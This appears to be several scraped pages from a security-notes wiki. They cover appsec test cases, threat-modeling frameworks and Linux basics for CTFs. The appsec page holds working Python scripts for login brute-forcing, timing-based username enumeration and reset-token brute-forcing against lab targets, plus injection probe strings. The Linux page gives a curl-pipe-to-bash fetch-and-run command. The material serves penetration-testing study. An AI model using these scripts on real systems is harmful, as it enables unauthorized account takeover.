Boot](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot) [NextSecure Remote Access with TailScale + Hardened SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh) Last updated 9 months ago * [1\. Create the Script](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-1.-create-the-script) * [2\. Add Cron Job](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-2.-add-cron-job) * [3\. Verify & Test](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-3.-verify-and-test) Copy crontab -e Copy 0 */3 * * * /root/shutdown.sh --- # Part 2 | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2.md) . Session Management HTTP Request Smuggling CSRF Login Brute Forcing Additional Payloads **Utilizing Burp Sequencer** Login to application to get a session id/cookie Find a request that is associated with session/cookie value in a server response Send this request to Burp sequencer> go to Sequencer tab In Live capture menu, select cookie value and Start live capture ENSURE THAT RESULTS ARE ABOIVE FIPS PASS LEVEL Note: This is very noisy [smuggler.py](https://github.com/defparam/smuggler) usage: Copy # single host smuggler.py -u $URL # from a list cat list_of_hosts.txt | python3 smuggler.py * Is SameSite set on cookies? * Test GET request * Does '`X-Http-Method-Override: GET`' work for override? * Does '`_method=POST`' work for override? * Does every form have anti-CSRF token present * Referer header used for origin validation? * Token Testing * Conduct test with token of the same length * Conduct test for static/known values * Conduct test with token from a separate session * Test previous valid token * Test with no token * Predictable? * Will XSS steal the token? * Able to swap HTTP request methods? (Get to POST) #### [](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2#default-credentials) Default Credentials https://www.cirt.net/passwords #### [](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2#weak-bruteforce-protections) Weak Bruteforce Protections **CAPTCHA** A weak implementation where the PHP code places the image's content into the **id** field. **Rate Limiting** The following script, understand messages related to rate-limiting and successful login attempts. **Insufficient Protections** * X-Forwarded-For Header #### [](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2#brute-force-usernames) Brute Force Usernames **User Unknown Attack** **Timing Attack** #### [](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2#brute-forcing-passwords) Brute Forcing Passwords **Password Inference** Families are: !\[\[Pasted image 20230309204953.png\]\] **Predictable Reset Token** **Time-Based Token Script** **Short Tokens** We can brute force this with FFUF. **Test for XSS and SQLi** Enter in EVERY parameter * '"\` Javascript injection test * '\`"> html tag attribute test * HTML injection * ${{7\*7}} CSTI + SSTI * \--'\`" SQLi [PreviousPart 1](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/targeted-test-cases) [NextPorts and associated Vectors](https://martian1337.gitbook.io/notes/notes/appsec/ports-and-associated-vectors) Last updated 1 year ago Copy import requests # file that contain user:pass userpass_file = "userpass.txt" # create url using user and password as argument url = "http://127.0.0.1/login.php" # rate limit blocks for 30 seconds lock_time = 30 # message that alert us we hit rate limit lock_message = "Too many failures" # read user and password with open(userpass_file, "r") as fh: for fline in fh: # skip comment if fline.startswith("#"): continue # take username username = fline.split(":")[0] # take password, join to keep password that contain a : password = ":".join(fline.split(":")[1:]) # prepare POST data data = { "user": username, "pass": password } # do the request res = requests.post(url, data=data) # handle generic credential error if "Invalid credentials" in res.text: print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password)) # user and password were valid ! elif "Access granted" in res.text: print("[+] Valid credentials: userid:{} passwd:{}".format(username, password)) # hit rate limit, let's say we have to wait 30 seconds elif lock_message in res.text: print("[-] Hit rate limit, sleeping 30") # do the actual sleep plus 0.5 to be sure time.sleep(lock_time+0.5) Copy import sys import requests import os.path # define target url, change as needed url = "http://brokenauthentication.hackthebox.eu/login.php" # define a fake headers to present ourself as Chromium browser, change if needed headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} # define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success valid = "Welcome" """ wordlist is expected as CSV with field like: Vendor,User,Password,Comment for this test we are using SecLists' Passwords/Default-Credentials/default-passwords.csv change this function if your wordlist has a different format """ def unpack(fline): # get user userid = fline.split(",")[1] # if pass could contain a , we should need to handle this in another way passwd = fline.split(",")[2] return userid, passwd """ our PHP example accepts requests via POST, and requires parameters as userid and passwd """ def do_req(url, userid, passwd, headers): data = {"userid": userid, "passwd": passwd, "submit": "submit"} res = requests.post(url, headers=headers, data=data) return res.text """ if defined valid string is found in response body return True """ def check(haystack, needle): if needle in haystack: return True else: return False def main(): # check if this script has been runned with an argument, and the argument exists and is a file if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): fname = sys.argv[1] else: print("[!] Please check wordlist.") print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) sys.exit() # open the file, this is our wordlist with open(fname) as fh: # read file line by line for fline in fh: # skip line if it starts with a comment if fline.startswith("#"): continue # use unpack() function to extract userid and password from wordlist, removing trailing newline userid, passwd = unpack(fline.rstrip()) # call do_req() to do the HTTP request print("[-] Checking account {} {}".format(userid, passwd)) res = do_req(url, userid, passwd, headers) # call function check() to verify if HTTP response text matches our content if (check(res, valid)): print("[+] Valid account found: userid:{} passwd:{}".format(userid, passwd)) if __name__ == "__main__": main() Copy $SECLISTS/Usernames/top-usernames-shortlist.txt Copy import sys import requests import os.path # define target url, change as needed url = "http://brokenauthentication.hackthebox.eu/login.php" # define a fake headers to present ourself as Chromium browser, change if needed headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} # define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success valid = "Welcome" """ wordlist is expected as simple list, we keep this function to have it ready if needed. for this test we are using /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt change this function if your wordlist has a different format """ def unpack(fline): userid = fline passwd = 'foobar' return userid, passwd """ our PHP example accepts requests via POST, and requires parameters as userid and passwd """ def do_req(url, userid, passwd, headers): data = {"userid": userid, "passwd": passwd, "submit": "submit"} res = requests.post(url, headers=headers, data=data) print("[+] user {:15} took {}".format(userid, res.elapsed.total_seconds())) return res.text def main(): # check if this script has been runned with an argument, and the argument exists and is a file if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): fname = sys.argv[1] else: print("[!] Please check wordlist.") print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) sys.exit() # open the file, this is our wordlist with open(fname) as fh: # read file line by line for fline in fh: # skip line if it starts with a comment if fline.startswith("#"): continue # use unpack() function to extract userid and password from wordlist, removing trailing newline userid, passwd = unpack(fline.rstrip()) # call do_req() to do the HTTP request print("[-] Checking account {} {}".format(userid, passwd)) res = do_req(url, userid, passwd, headers) if __name__ == "__main__": main() Copy lowercase characters, like abcd..z uppercase characters, like ABCD..Z digit, numbers from 0 to 9 special characters, like ,./.?! or any other printable one (space is a char!) Copy # Grep Lower + Uppercase, between 8-12 chars grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep -E '^.{8,12}$' | Copy from hashlib import md5 import requests from sys import exit from time import time url = "http://127.0.0.1/reset_token_time.php" # to have a wide window try to bruteforce starting from 120seconds ago now = int(time()) start_time = now - 120 fail_text = "Wrong token" # loop from start_time to now. + 1 is needed because of how range() works for x in range(start_time, now + 1): # get token md5 md5_token = md5(str(x).encode()).hexdigest() data = { "submit": "check", "token": md5_token } print("checking {} {}".format(str(x), md5_token)) # send the request res = requests.post(url, data=data) # response text check if not fail_text in res.text: print(res.text) print("[*] Congratulations! raw reply printed before") exit() Copy ffuf -w --ss "Valid" "https://brokenauthentication.hackthebox.eu/token.php?user=admin&token=FUZZ" Copy --'`">kdskf${{7*7}} --- # Threat Modeling | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling.md) . [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#frameworks) Frameworks ---------------------------------------------------------------------------------------------------------------------- There are various frameworks for a conducting a good threat model for an application but the most commonly used Threat Modelling Frameworks are STRIDE, DREAD and PASTA. **To explain it briefly:** STRIDE is used to identify DREAD is used to evaluate PASTA is used to identify and evaluate ATASM is used for understanding system architecture [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#id-5-benefits-of-threat-modeling) 5 Benefits of Threat Modeling --------------------------------------------------------------------------------------------------------------------------------------------------------------- 1. Unveiling Vulnerabilities: Expose hidden weaknesses in your applications and fortify your defenses. 2. Proactive Defense: Stay one step ahead by identifying potential attack vectors and crafting preemptive strategies. 3. Cost-Saving Superpower: Save big on post-breach remediation costs by preventing security flaws early on. 4. Collaborative Culture: Foster teamwork and break down silos as diverse teams work together to identify risks. 5. Regulatory Resilience: Navigate the compliance landscape confidently with security considerations from the start. In general, a good threat modeling assessment should provide answers to the following questions: What is being built? What could go wrong? Where are the most vulnerable interactions with the application? What threats are relevant to the application? What are we going to to do about those threats? How can we protect against those threats? * * * [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#stride-threat-modeling-framework) STRIDE Threat Modeling Framework ------------------------------------------------------------------------------------------------------------------------------------------------------------------ When it comes to securing your systems, understanding potential threats is key. One of the most effective ways to do this is through the STRIDE threat modeling framework. STRIDE is like a checklist that helps you think about different kinds of security risks. Here’s a breakdown of what STRIDE stands for and how you can use it to make your systems safer: #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#what-does-stride-stand-for) What Does STRIDE Stand For? * **Spoofing**: This is all about pretending to be someone you’re not. Imagine a hacker impersonating a legitimate user to gain unauthorized access. Spoofing is a big deal because it can let attackers sneak into systems without permission. * **Tampering**: Tampering means messing with data or system components. Think of it like someone sneaking into your database and changing information. This can lead to corrupted data and other serious issues. * **Repudiation**: This involves users denying they did something. Without proper tracking, someone might claim they didn’t perform certain actions, which can be problematic if those actions are malicious. * **Information Disclosure**: This is about unauthorized access to sensitive data. If your system leaks confidential information, it could lead to data breaches and privacy issues. * **Denial of Service (DoS)**: A DoS attack overloads your system, making it unavailable to legitimate users. It’s like someone clogging up the highway so no one else can drive. * **Elevation of Privilege**: This is when someone gains more access or control than they’re supposed to. For example, a regular user might find a way to get admin-level permissions. #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#how-to-use-stride) How to Use STRIDE 1. **Understand Your Assets**: Start by figuring out what’s valuable in your system—whether it’s data, applications, or other components. Know what needs protection. 2. **Identify Potential Threats**: For each part of your system, think about how the different STRIDE categories could apply. Ask yourself questions like: * Could someone impersonate a user or system (spoofing)? * Is there a risk of tampering with data or settings? * Are there ways users might deny their actions (repudiation)? * Is there sensitive info that could be exposed (information disclosure)? * Could the system be overwhelmed and become unavailable (DoS)? * Are there ways to gain unauthorized access or permissions (elevation of privilege)? 3. **Analyze and Prioritize**: Once you’ve identified potential threats, assess how likely they are and how severe their impact would be. Focus on the biggest risks first. 4. **Mitigate Threats**: Create strategies to counteract these threats. This might include: * Implementing strong authentication to prevent spoofing. * Using data integrity checks to prevent tampering. * Setting up comprehensive logging to handle repudiation. * Encrypting sensitive data to prevent information disclosure. * Applying rate limits and having backup systems to handle DoS attacks. * Ensuring proper authorization checks to prevent privilege escalation. 5. **Review Regularly**: Threat modeling isn’t a one-time task. Regularly revisit your threat model to adapt to new threats and changes in your system. #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#the-value-of-stride) The value of STRIDE STRIDE gives you a structured way to think about and address security threats. It ensures you consider a wide range of risks, helping you build a more robust security posture. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#stride-example) STRIDE Example Working on an online banking app: * **Spoofing**: An attacker might set up a fake login page to steal user credentials. * **Tampering**: They could alter transaction records to steal money. * **Repudiation**: Without proper logs, users might deny making unauthorized transactions. * **Information Disclosure**: Sensitive financial data could be leaked if not properly protected. * **Denial of Service**: Attackers could flood the system with requests, causing it to crash. * **Elevation of Privilege**: A user might exploit a bug to gain admin access. * * * [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#dread-threat-modeling-framework) DREAD Threat Modeling Framework ---------------------------------------------------------------------------------------------------------------------------------------------------------------- When you’re working on securing your systems, it’s crucial to understand how different threats might impact your project. The DREAD framework is a handy tool for evaluating and prioritizing these threats. It helps you figure out which risks are worth your attention and resources. Here’s a simple breakdown of DREAD and how to use it: #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#what-does-dread-stand-for) What Does DREAD Stand For? * **Damage Potential**: This is about how much harm an attack could cause if it succeeds. For example, if a security breach could lead to a massive data leak, that’s high damage potential. * **Reproducibility**: This measures how easily an attacker can repeat the attack. If an exploit is easy to reproduce, it’s more dangerous because it can be used over and over. * **Exploitability**: This looks at how easy it is to carry out the attack. If an attacker needs only basic skills or tools to exploit a vulnerability, it’s highly exploitable. * **Affected Users**: This assesses how many users are impacted by the threat. If an attack affects a large number of users, it’s a bigger concern. * **Discoverability**: This measures how easy it is for an attacker to find the vulnerability. If it’s something that’s hard to discover, it’s less of an immediate risk. #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#using-dread-effectively) Using DREAD effectively DREAD helps you evaluate threats in a structured way, making it easier to decide where to allocate your security resources. It’s a practical method for turning abstract threats into concrete priorities. #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#how-to-use-dread) How to Use DREAD 1. **Identify Threats**: Start by listing out potential threats to your system. Think about what could go wrong and what kinds of attacks could be a problem. 2. **Evaluate Each Threat Using DREAD**: For each threat, assess it based on the five DREAD categories: * **Damage Potential**: How severe would the damage be if this threat were exploited? * **Reproducibility**: Can the attack be repeated easily? If yes, this makes the threat more critical. * **Exploitability**: How easy is it for an attacker to carry out the attack? The easier it is, the higher the risk. * **Affected Users**: How many people would be impacted? More affected users mean a higher priority. * **Discoverability**: How easy is it for someone to discover this vulnerability? If it’s easy to find, it’s a bigger threat. 3. **Score and Prioritize**: Assign scores to each threat based on your evaluation. For example, you might rate each category from 1 (low) to 10 (high). Add up the scores to get a sense of which threats are the most critical. 4. **Address the Top Threats**: Focus on the threats with the highest scores. These are the ones that pose the greatest risk to your system and should be prioritized in your security plan. 5. **Review and Update**: Like with any threat model, keep revisiting your DREAD assessments. New threats can emerge, and your system can change, so regular updates are essential. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#dread-example) DREAD Example Securing a new e-commerce platform: * **Damage Potential**: A vulnerability that exposes customer credit card information has high damage potential because of the potential financial and reputational damage. * **Reproducibility**: If the vulnerability is easily repeatable, like a SQL injection that works with a simple script, it’s more dangerous. * **Exploitability**: If the exploit requires just a basic understanding of SQL, it’s highly exploitable. * **Affected Users**: If the vulnerability could impact all users of the platform, it’s a major concern. * **Discoverability**: If this vulnerability is easy to find, like a missing input validation field, it needs urgent attention. * * * [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#pasta-threat-modeling-framework) PASTA Threat Modeling Framework ---------------------------------------------------------------------------------------------------------------------------------------------------------------- When it comes to understanding and managing security threats, the PASTA (Process for Attack Simulation and Threat Analysis) framework is a powerful tool. It’s a structured approach that helps you analyze threats in a comprehensive way. Here’s a friendly guide to what PASTA is all about and how you can use it: #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#pasta-use-case) PASTA use case? PASTA is valuable because it provides a structured way to think through security issues from multiple angles. It helps you understand not just what could go wrong, but also how to address it effectively. It’s like having a roadmap for both identifying and mitigating risks. #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#what-is-pasta) What is PASTA? PASTA is an acronym for **Process for Attack Simulation and Threat Analysis**. It’s designed to simulate potential attacks and understand how they could affect your system. The goal is to help you identify, prioritize, and address threats in a systematic manner. Here’s a rundown of the seven stages involved: #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#the-seven-stages-of-pasta) The Seven Stages of PASTA 1. **Define the Objectives**: Start by understanding what your system does and what it needs to protect. This includes identifying critical assets, such as sensitive data or key functionalities. Ask yourself: What are the system’s goals, and what are we trying to safeguard? 2. **Define the Technical Scope**: In this stage, you dive into the technical details of your system. This includes mapping out the architecture, identifying components, and understanding how data flows through the system. It’s like drawing a detailed blueprint of your system’s infrastructure. 3. **Decompose the Application**: Break down your application or system into its smaller components and understand how each part interacts. This helps in identifying potential attack vectors and areas of vulnerability. Think of it as taking apart a machine to see how each piece works and where it might fail. 4. **Identify Threat Agents and Their Goals**: Consider who might want to attack your system and why. Different threat agents have different motivations and techniques. Are they insiders or outsiders? Do they want financial gain, data theft, or just to cause disruption? 5. **Identify and Analyze Threats**: Based on the threat agents identified, list out potential threats. Analyze how these threats could exploit vulnerabilities in your system. This stage is about thinking like an attacker and understanding what they might target. 6. **Assess Vulnerabilities**: Look at your system through the lens of the identified threats. Evaluate how vulnerable each part of your system is to these threats. This might involve reviewing security controls, access permissions, and other protective measures. 7. **Determine and Implement Mitigations**: Finally, come up with strategies to address the vulnerabilities and threats you’ve identified. This could involve implementing new security controls, improving existing ones, or changing system designs. The goal is to reduce the risk to an acceptable level. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#example-for-pasta) Example for PASTA Cloud-based project management tool: * **Define Objectives**: Your goal is to protect project data, user information, and ensure the tool is available to authorized users. * **Define Technical Scope**: Map out how data moves through the tool, including storage, processing, and user interactions. * **Decompose the Application**: Break down the tool into components like user authentication, data storage, and communication channels. * **Identify Threat Agents**: Consider threats like disgruntled employees, hackers seeking data, or competitors looking to disrupt your service. * **Identify and Analyze Threats**: For example, an attacker could exploit weak authentication to gain unauthorized access. * **Assess Vulnerabilities**: Check if current authentication methods are strong enough or if they’re prone to brute force attacks. * **Determine and Implement Mitigations**: Strengthen authentication with multi-factor authentication, review and tighten access controls, and regularly update security protocols. * * * ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#atasm-threat-modeling-framework) ATASM Threat Modeling Framework **ATASM** (Architecture, Threats, Attack Surfaces, and Mitigations) is a modern threat-modeling approach that emphasizes the critical role of understanding system architecture as the foundation for effective threat modeling. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#what-is-atasm) What is ATASM? ATASM is built on the idea that you must **fully understand how your system is structured and how its components interact** before you can accurately and thoroughly identify threats and defenses. Unlike some frameworks that start from lists of attacks or abstract threat types, ATASM is grounded directly in your system’s architecture and flows. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#how-does-atasm-work) How does ATASM work? 1. **Architecture** * Begin by analyzing and decomposing your system into its core technology components and logical functions. * Document how components interact, how data flows, and what assets require protection. * The goal is to create a complete map of the system’s structure as the basis for all next steps. 2. **Threats** * Identify threats relevant to the actual architecture. This means considering what motivated attackers might go after, using real-world attack profiles and scenarios. * Tailor threat identification closely to your mapped flows and assets, not just using generic lists. 3. **Attack Surfaces** * Enumerate and diagram all points where an attacker could interact with or access the system. This includes APIs, user interfaces, network boundaries, data entry points, and communication channels between components. The detailed architecture work makes it much easier to visualize and understand all attack surfaces. 4. **Mitigations** * Prioritize and apply security controls at the most critical and exposed attack surfaces. * Each mitigation is mapped specifically to the threats and surfaces it addresses, enabling deep, defense-in-depth, architecture-driven protection. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#why-use-atasm) Why use ATASM? * **Grounds threat modeling in reality:** Starts from the system as it actually exists, not just checklists. * **Scales to complexity:** Well-suited for large, interconnected architectures. * **Bridges gaps:** Ensures both technical (development, ops) and security teams collaborate through a shared structural understanding. * Building mitigations is more targeted and effective, since you’re defending real boundaries and flows exposed in your own system. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#example-atasm-process) Example ATASM Process Working on a SaaS platform: * **Architecture:** Diagram cloud infrastructure, user modules, microservices, and external integrations. * **Threats:** Identify specific threats such as privilege escalation in APIs, data exfiltration via insecure S3 buckets, or insider abuse of admin consoles. * **Attack Surfaces:** Pinpoint public API endpoints, login forms, third-party webhook consumers, and admin dashboards as main attack surfaces. * **Mitigations:** Apply rate-limiting and WAF to public APIs, IAM policies to storage buckets, RBAC for admin consoles, monitoring on third-party data flows. ATASM’s value is in making your threat model concrete: architecture first, everything else follows in context. This reduces guesswork and helps prioritize defenses exactly where your system most needs them. * * * [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#use-misuse-abuse-cases) Use/Misuse/Abuse Cases ---------------------------------------------------------------------------------------------------------------------------------------------- In a use case, we focus on defining the proper behavior or interaction with our software application. In a misuse case, we adopt the perspective of a hacker or threat actor. We then explore how such an adversary might exploit our system. By developing and running misuse or abuse test cases, we can identify and mitigate potential attacks from malicious actors. Misuse cases often involve creating test scenarios based on known attack vectors and vulnerabilities, then executing these scenarios to assess the software's security and resilience. [PreviousProduct Security Hardening](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening) [NextPHP Security](https://martian1337.gitbook.io/notes/notes/product-security-engineering/php-security) Last updated 10 months ago * [Frameworks](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#frameworks) * [5 Benefits of Threat Modeling](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#id-5-benefits-of-threat-modeling) * [STRIDE Threat Modeling Framework](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#stride-threat-modeling-framework) * [STRIDE Example](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#stride-example) * [DREAD Threat Modeling Framework](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#dread-threat-modeling-framework) * [DREAD Example](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#dread-example) * [PASTA Threat Modeling Framework](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#pasta-threat-modeling-framework) * [Example for PASTA](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#example-for-pasta) * [ATASM Threat Modeling Framework](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#atasm-threat-modeling-framework) * [What is ATASM?](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#what-is-atasm) * [How does ATASM work?](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#how-does-atasm-work) * [Why use ATASM?](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#why-use-atasm) * [Example ATASM Process](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#example-atasm-process) * [Use/Misuse/Abuse Cases](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling#use-misuse-abuse-cases) --- # Linux Basics | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs.md) . When capturing flags use the following for searching of specific files: Copy find / -type f -iname "file.txt" 2>/dev/null ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#base64-encode-and-decode) Base64 Encode & Decode Copy # Encode File cat |base64 -w 0;echo # Decode File echo -n |base64 -d ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#wget) wget Copy wget -O file.sh ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#curl) curl Copy curl -o file.sh ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#fileless-downloads) Fileless Downloads Copy curl -o file.sh |bash ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#ssh) SSH Option Description `-type f` Hereby, we define the type of the searched object. In this case, '`f`' stands for '`file`'. `-name *.conf` With '`-name`', we indicate the name of the file we are looking for. The asterisk (`*`) stands for 'all' files with the '`.conf`' extension. `-user root` This option filters all files whose owner is the root user. `-size +20k` We can then filter all the located files and specify that we only want to see the files that are larger than 20 KiB. `-newermt 2020-03-03` With this option, we set the date. Only files newer than the specified date will be presented. `-exec ls -al {} \;` This option executes the specified command, using the curly brackets as placeholders for each result. The backslash escapes the next character from being interpreted by the shell because otherwise, the semicolon would terminate the command and not reach the redirection. `2>/dev/null` This is a `STDERR` redirection to the '`null device`', which we will come back to in the next section. This redirection ensures that no errors are displayed in the terminal. This redirection must `not` be an option of the 'find' command. Practical example using multiple options to filter the search: Path Description `/` The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as the files required to boot the other filesystems. After boot, all of the other filesystems are mounted at standard mount points as subdirectories of the root. `/bin` Contains essential command binaries. `/boot` Consists of the static bootloader, kernel executable, and files required to boot the Linux OS. `/dev` Contains device files to facilitate access to every hardware device attached to the system. `/etc` Local system configuration files. Configuration files for installed applications may be saved here as well. `/home` Each user on the system has a subdirectory here for storage. `/lib` Shared library files that are required for system boot. `/media` External removable media devices such as USB drives are mounted here. `/mnt` Temporary mount point for regular filesystems. `/opt` Optional files such as third-party tools can be saved here. `/root` The home directory for the root user. `/sbin` This directory contains executables used for system administration (binary system files). `/tmp` The operating system and many programs use this directory to store temporary files. This directory is generally cleared upon system boot and may be deleted at other times without any warning. `/usr` Contains executables, libraries, man files, etc. `/var` This directory contains variable data files such as log files, email in-boxes, web application related files, cron files, and more. Command Description **Command** **Description** `man ` Opens man pages for the specified tool. ` -h` Prints the help page of the tool. `apropos ` Searches through man pages' descriptions for instances of a given keyword. `cat` Concatenate and print files. `whoami` Displays current username. `id` Returns users identity. `hostname` Sets or prints the name of the current host system. `uname` Prints operating system name. `pwd` Returns working directory name. `ifconfig` The `ifconfig` utility is used to assign or view an address to a network interface and/or configure network interface parameters. `ip` Ip is a utility to show or manipulate routing, network devices, interfaces, and tunnels. `netstat` Shows network status. `ss` Another utility to investigate sockets. `ps` Shows process status. `who` Displays who is logged in. `env` Prints environment or sets and executes a command. `lsblk` Lists block devices. `lsusb` Lists USB devices. `lsof` Lists opened files. `lspci` Lists PCI devices. `sudo` Execute command as a different user. `su` The `su` utility requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed. `useradd` Creates a new user or update default new user information. `userdel` Deletes a user account and related files. `usermod` Modifies a user account. `addgroup` Adds a group to the system. `delgroup` Removes a group from the system. `passwd` Changes user password. `dpkg` Install, remove and configure Debian-based packages. `apt` High-level package management command-line utility. `aptitude` Alternative to `apt`. `snap` Install, remove and configure snap packages. `gem` Standard package manager for Ruby. `pip` Standard package manager for Python. `git` Revision control system command-line utility. `systemctl` Command-line based service and systemd control manager. `ps` Prints a snapshot of the current processes. `journalctl` Query the systemd journal. `kill` Sends a signal to a process. `bg` Puts a process into background. `jobs` Lists all processes that are running in the background. `fg` Puts a process into the foreground. `curl` Command-line utility to transfer data from or to a server. `wget` An alternative to `curl` that downloads files from FTP or HTTP(s) server. `python3 -m http.server` Starts a Python3 web server on TCP port 8000. `ls` Lists directory contents. `cd` Changes the directory. `clear` Clears the terminal. `touch` Creates an empty file. `mkdir` Creates a directory. `tree` Lists the contents of a directory recursively. `mv` Move or rename files or directories. `cp` Copy files or directories. `nano` Terminal based text editor. `which` Returns the path to a file or link. `find` Searches for files in a directory hierarchy. `updatedb` Updates the locale database for existing contents on the system. `locate` Uses the locale database to find contents on the system. `more` Pager that is used to read STDOUT or files. `less` An alternative to `more` with more features. `head` Prints the first ten lines of STDOUT or a file. `tail` Prints the last ten lines of STDOUT or a file. `sort` Sorts the contents of STDOUT or a file. `grep` Searches for specific results that contain given patterns. `cut` Removes sections from each line of files. `tr` Replaces certain characters. `column` Command-line based utility that formats its input into multiple columns. `awk` Pattern scanning and processing language. `sed` A stream editor for filtering and transforming text. `wc` Prints newline, word, and byte counts for a given input. `chmod` Changes permission of a file or directory. `chown` Changes the owner and group of a file or directory. [PreviousIT Tasks](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks) [NextPowerShell](https://martian1337.gitbook.io/notes/notes/common-system-task-info/powershell) Last updated 1 year ago * [Base64 Encode & Decode](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#base64-encode-and-decode) * [wget](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#wget) * [curl](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#curl) * [Fileless Downloads](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#fileless-downloads) * [SSH](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs#ssh) Copy scp @:/ . Copy find / -type f -name *.conf -user root -size +20k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null --- # Web Tools | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/tools.md) . **Tools** cURL ffuf Nmap SQLmap Postman **sqlmap and ZAP auth/cookie integration** 1. Open ZAP and login in to target application 2. Visit request that contains authenticated cookie 3. Copy the cookie value in the request tab 4. Run sqlmap command with cookie and proxy included Example uses for the field: Proxy sqlmap through ZAP with custom user agent "bughunter" Copy sqlmap -u 